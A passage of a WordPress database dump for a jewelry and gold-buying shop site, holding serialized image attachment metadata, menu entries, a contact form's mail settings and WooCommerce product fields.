5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1421683909;s:9:\"copyright\";s:13:\"© Jesse_Kody\";s:12:\"focal_length\";s:2:\"16\";s:3:\"iso\";s:3:\"250\";s:13:\"shutter_speed\";s:3:\"1.3\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:1;}}'),(320,168,'_wp_attachment_image_alt','Salem, all that glitters'),(321,169,'_wp_attached_file','2015/02/Salem-outside.jpg'),(322,169,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:459;s:4:\"file\";s:25:\"2015/02/Salem-outside.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Salem-outside-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Salem-outside-300x215.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:215;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"Salem-outside-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"Salem-outside-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"Salem-outside-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"Salem-outside-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:24:\"Salem-outside-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:8;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:1421685097;s:9:\"copyright\";s:13:\"© Jesse_Kody\";s:12:\"focal_length\";s:2:\"16\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:4:\"0.05\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:1;}}'),(323,169,'_wp_attachment_image_alt','Salem, all that glitters'),(324,171,'_menu_item_type','custom'),(325,171,'_menu_item_menu_item_parent','0'),(326,171,'_menu_item_object_id','171'),(327,171,'_menu_item_object','custom'),(328,171,'_menu_item_target','_blank'),(329,171,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(330,171,'_menu_item_xfn',''),(331,171,'_menu_item_url','http://portland.craigslist.org/search/sss?query=all%20that%20glitters'),(333,176,'_form','<table>\n<tr><td>Name *</td><td> [text* your-name] </td></tr>\n\n<tr><td>Email *</td><td>[email* your-email]</td></tr>\n\n<tr><td>Subject *</td><td>[text* your-subject] </td></tr>\n\n<tr><td>Message *</td><td>[textarea* your-message] </td></tr>\n\n<tr><td>Security Code</td><td>[captchac captcha]</td></tr>\n<tr><td>Retype Code *</td><td>[captchar captcha]</td></tr>\n<tr><td></td><td>[submit \"Send\"]</td></tr>\n</table>'),(334,176,'_mail','a:8:{s:7:\"subject\";s:14:\"[your-subject]\";s:6:\"sender\";s:38:\"[your-name] <wordpress@atgjewelry.com>\";s:4:\"body\";s:170:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on fuze7 (http://atgjewelry.com/fuze7)\";s:9:\"recipient\";s:15:\"diane@fuze7.com\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:1;s:13:\"exclude_blank\";b:0;}'),(335,176,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:14:\"[your-subject]\";s:6:\"sender\";s:32:\"fuze7 <wordpress@atgjewelry.com>\";s:4:\"body\";s:112:\"Message Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on fuze7 (http://atgjewelry.com/fuze7)\";s:9:\"recipient\";s:12:\"[your-email]\";s:18:\"additional_headers\";s:32:\"Reply-To: daniel@tualatinweb.com\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(336,176,'_messages','a:23:{s:12:\"mail_sent_ok\";s:43:\"Your message was sent successfully. Thanks.\";s:12:\"mail_sent_ng\";s:93:\"Failed to send your message. Please try later or contact the administrator by another method.\";s:16:\"validation_error\";s:74:\"Validation errors occurred. Please confirm the fields and submit it again.\";s:4:\"spam\";s:93:\"Failed to send your message. Please try later or contact the administrator by another method.\";s:12:\"accept_terms\";s:35:\"Please accept the terms to proceed.\";s:16:\"invalid_required\";s:34:\"Please fill in the required field.\";s:16:\"invalid_too_long\";s:23:\"This input is too long.\";s:17:\"invalid_too_short\";s:24:\"This input is too short.\";s:17:\"captcha_not_match\";s:31:\"Your entered code is incorrect.\";s:14:\"invalid_number\";s:28:\"Number format seems invalid.\";s:16:\"number_too_small\";s:25:\"This number is too small.\";s:16:\"number_too_large\";s:25:\"This number is too large.\";s:13:\"invalid_email\";s:28:\"Email address seems invalid.\";s:11:\"invalid_url\";s:18:\"URL seems invalid.\";s:11:\"invalid_tel\";s:31:\"Telephone number seems invalid.\";s:23:\"quiz_answer_not_correct\";s:27:\"Your answer is not correct.\";s:12:\"invalid_date\";s:26:\"Date format seems invalid.\";s:14:\"date_too_early\";s:23:\"This date is too early.\";s:13:\"date_too_late\";s:22:\"This date is too late.\";s:13:\"upload_failed\";s:22:\"Failed to upload file.\";s:24:\"upload_file_type_invalid\";s:30:\"This file type is not allowed.\";s:21:\"upload_file_too_large\";s:23:\"This file is too large.\";s:23:\"upload_failed_php_error\";s:38:\"Failed to upload file. Error occurred.\";}'),(337,176,'_additional_settings',''),(338,176,'_locale','en_US'),(339,180,'_edit_lock','1425937232:1'),(340,180,'_edit_last','1'),(341,180,'_wp_page_template','page-fullwidth.php'),(342,182,'_menu_item_type','post_type'),(343,182,'_menu_item_menu_item_parent','67'),(344,182,'_menu_item_object_id','180'),(345,182,'_menu_item_object','page'),(346,182,'_menu_item_target',''),(347,182,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(348,182,'_menu_item_xfn',''),(349,182,'_menu_item_url',''),(351,189,'_edit_lock','1425939771:1'),(352,189,'_edit_last','1'),(353,190,'_wp_attached_file','2015/03/Citizen-Watch-BY2000-55W-1-300x300.png'),(354,190,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:46:\"2015/03/Citizen-Watch-BY2000-55W-1-300x300.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:46:\"Citizen-Watch-BY2000-55W-1-300x300-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:46:\"Citizen-Watch-BY2000-55W-1-300x300-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:44:\"Citizen-Watch-BY2000-55W-1-300x300-90x90.png\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:46:\"Citizen-Watch-BY2000-55W-1-300x300-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:46:\"Citizen-Watch-BY2000-55W-1-300x300-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:46:\"Citizen-Watch-BY2000-55W-1-300x300-200x150.png\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:45:\"Citizen-Watch-BY2000-55W-1-300x300-100x30.png\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(355,189,'_thumbnail_id','190'),(356,189,'_visibility','visible'),(357,189,'_stock_status','instock'),(358,189,'total_sales','0'),(359,189,'_downloadable','no'),(360,189,'_virtual','no'),(361,189,'_regular_price',''),(362,189,'_sale_price',''),(363,189,'_purchase_note',''),(364,189,'_featured','no'),(365,189,'_weight',''),(366,189,'_length',''),(367,189,'_width',''),(368,189,'_height',''),(369,189,'_sku',''),(370,189,'_product_attributes','a:0:{}'),(371,189,'_sale_price_dates_from',''),(372,189,'_sale_price_dates_to',''),(373,189,'_price',''),(374,189,'_sold_individually',''),(375,189,'_manage_stock','no'),(376,189,'_backorders','no'),(377,189,'_stock',''),(378,189,'_upsell_ids','a:0:{}'),(379,189,'_crosssell_ids','a:0:{}'),(380,189,'_product_image_gallery',''),(381,191,'_edit_lock','1425939281:1'),(382,191,'_edit_last','1'),(383,191,'_thumbnail_id','190'),(384,191,'tz_portfolio_type','Grid Gallery'),(385,191,'tz_portfolio_date','2/2/2015'),(386,191,'tz_portfolio_client','Citizen'),(387,191,'tz_portfolio_info','Info'),(388,191,'tz_portfolio_url','http://nike.com/'),(389,191,'tz_image_lightbox','no'),(390,191,'tz_audio_format','mp3'),(391,191,'post_views_count','1'),(392,193,'_edit_lock','1425953794:1'),(393,193,'_edit_last','1'),(394,193,'_thumbnail_id','190'),(395,193,'post_views_count','1'),(396,72,'_wp_trash_meta_status','publish'),(397,72,'_wp_trash_meta_time','1425954502'),(398,70,'post_views_count','1'),(399,70,'_wp_trash_meta_status','publish'),(400,70,'_wp_trash_meta_time','1425954509'),(401,194,'_edit_lock','1426032996:1'),(402,194,'_edit_last','1'),(403,195,'_wp_attached_file','2015/03/Gold-Coins.jpg'),(404,195,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:400;s:4:\"file\";s:22:\"2015/03/Gold-Coins.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Gold-Coins-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Gold-Coins-300x100.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Gold-Coins-1024x341.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:341;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"Gold-Coins-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:22:\"Gold-Coins-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"Gold-Coins-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"Gold-Coins-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:21:\"Gold-Coins-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:7.0999999999999996;s:6:\"credit\";s:11:\"REMY MUSSER\";s:6:\"camera\";s:4:\"E-M5\";s:7:\"caption\";s:27:\"Five Dollars gold coins USD\";s:17:\"created_timestamp\";i:1387734018;s:9:\"copyright\";s:13:\"NETFALLS 2013\";s:12:\"focal_length\";s:2:\"43\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:23:\"Five Dollars gold coins\";s:11:\"orientation\";i:1;}}'),(405,194,'_thumbnail_id','195'),(406,195,'_wp_attachment_image_alt','Gold Coins'),(429,204,'_wp_attached_file','2015/03/banner2.jpg'),(408,196,'_edit_lock','1426032930:1'),(409,196,'_edit_last','1'),(410,197,'_wp_attached_file','2015/03/Gold-Jewelry.jpg'),(411,197,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:400;s:4:\"file\";s:24:\"2015/03/Gold-Jewelry.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Gold-Jewelry-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Gold-Jewelry-300x100.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Gold-Jewelry-1024x341.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:341;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"Gold-Jewelry-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"Gold-Jewelry-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:24:\"Gold-Jewelry-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:24:\"Gold-Jewelry-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:23:\"Gold-Jewelry-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:9;s:6:\"credit\";s:16:\"Laura Passavanti\";s:6:\"camera\";s:14:\"Canon EOS 550D\";s:7:\"caption\";s:53:\"Closeup of yellow gold jewelery on a black background\";s:17:\"created_timestamp\";i:1338410477;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"100\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:3:\"0.6\";s:5:\"title\";s:12:\"Gold Jewelry\";s:11:\"orientation\";i:1;}}'),(412,197,'_wp_attachment_image_alt','Gold Jewelry'),(413,196,'_thumbnail_id','197'),(415,198,'_edit_lock','1426032974:1'),(416,198,'_edit_last','1'),(417,199,'_wp_attached_file','2015/03/Gold_Diamond-Jewelry.jpg'),(418,199,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:400;s:4:\"file\";s:32:\"2015/03/Gold_Diamond-Jewelry.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"Gold_Diamond-Jewelry-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"Gold_Diamond-Jewelry-300x100.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"Gold_Diamond-Jewelry-1024x341.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:341;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"Gold_Diamond-Jewelry-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:32:\"Gold_Diamond-Jewelry-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:32:\"Gold_Diamond-Jewelry-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:32:\"Gold_Diamond-Jewelry-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:31:\"Gold_Diamond-Jewelry-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:9;s:6:\"credit\";s:16:\"Laura Passavanti\";s:6:\"camera\";s:14:\"Canon EOS 550D\";s:7:\"caption\";s:45:\"Closeup of gold jewelery with precious stones\";s:17:\"created_timestamp\";i:1338411212;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"100\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:1:\"1\";s:5:\"title\";s:12:\"Gold Jewelry\";s:11:\"orientation\";i:1;}}'),(419,199,'_wp_attachment_image_alt','Gold and Diamond jewelry'),(420,198,'_thumbnail_id','199'),(430,204,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:19:\"2015/03/banner2.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"banner2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"banner2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:17:\"banner2-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:19:\"banner2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"banner2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"banner2-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:18:\"banner2-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:1;}}'),(422,200,'_edit_lock','1426455606:1'),(423,200,'_edit_last','1'),(424,201,'_wp_attached_file','2015/03/Loans.jpg'),(425,201,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:400;s:4:\"file\";s:17:\"2015/03/Loans.jpg\";s:5:\"sizes\";a:8:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"Loans-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"Loans-300x100.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"Loans-1024x341.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:341;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:15:\"Loans-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:17:\"Loans-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:17:\"Loans-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"Loans-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:16:\"Loans-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:5.5999999999999996;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"NIKON D80\";s:7:\"caption\";s:34:\"dollar banks note money background\";s:17:\"created_timestamp\";i:1358943292;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:4:\"0.02\";s:5:\"title\";s:33:\"Dollar bank note money background\";s:11:\"orientation\";i:1;}}'),(426,201,'_wp_attachment_image_alt','Loans'),(427,200,'_thumbnail_id','201'),(431,205,'_wp_attached_file','2015/03/banner3.jpg'),(432,205,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:19:\"2015/03/banner3.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"banner3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"banner3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:17:\"banner3-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:19:\"banner3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"banner3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"banner3-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:18:\"banner3-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:1;}}'),(433,206,'_wp_attached_file','2015/03/banner1.jpg'),(434,206,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:19:\"2015/03/banner1.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"banner1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"banner1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:17:\"banner1-90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:19:\"banner1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"banner1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"banner1-200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:18:\"banner1-100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:1;}}'),(435,204,'_edit_lock','1425959449:1'),(436,210,'_wp_attached_file','2015/03/Many-Guitars-.jpg'),(437,210,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1732;s:6:\"height\";i:1155;s:4:\"file\";s:25:\"2015/03/Many-Guitars-.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Many-Guitars--150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Many-Guitars--300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Many-Guitars--1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"Many-Guitars--90x90.jpg\";s:5:\"width\";i:90;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"Many-Guitars--150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"Many-Guitars--300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:25:\"Many-Guitars--200x150.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"slider-post-thumbnail\";a:4:{s:4:\"file\";s:26:\"Many-Guitars--1370x588.jpg\";s:5:\"width\";i:1370;s:6:\"height\";i:588;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"slider-thumb\";a:4:{s:4:\"file\";s:24:\"Many-Guitars--100x30.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:30;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";d:4;s:6:\"credit\";s:10:\"Todd Arena\";s:6:\"camera\";s:13:\"Canon EOS 20D\";s:7:\"caption\";s:47:\"A wall with vintage guitars hanging on display.\";s:17:\"created_timestamp\";i:1226170751;s:9:\"copyright\";s:16:\"© by Todd 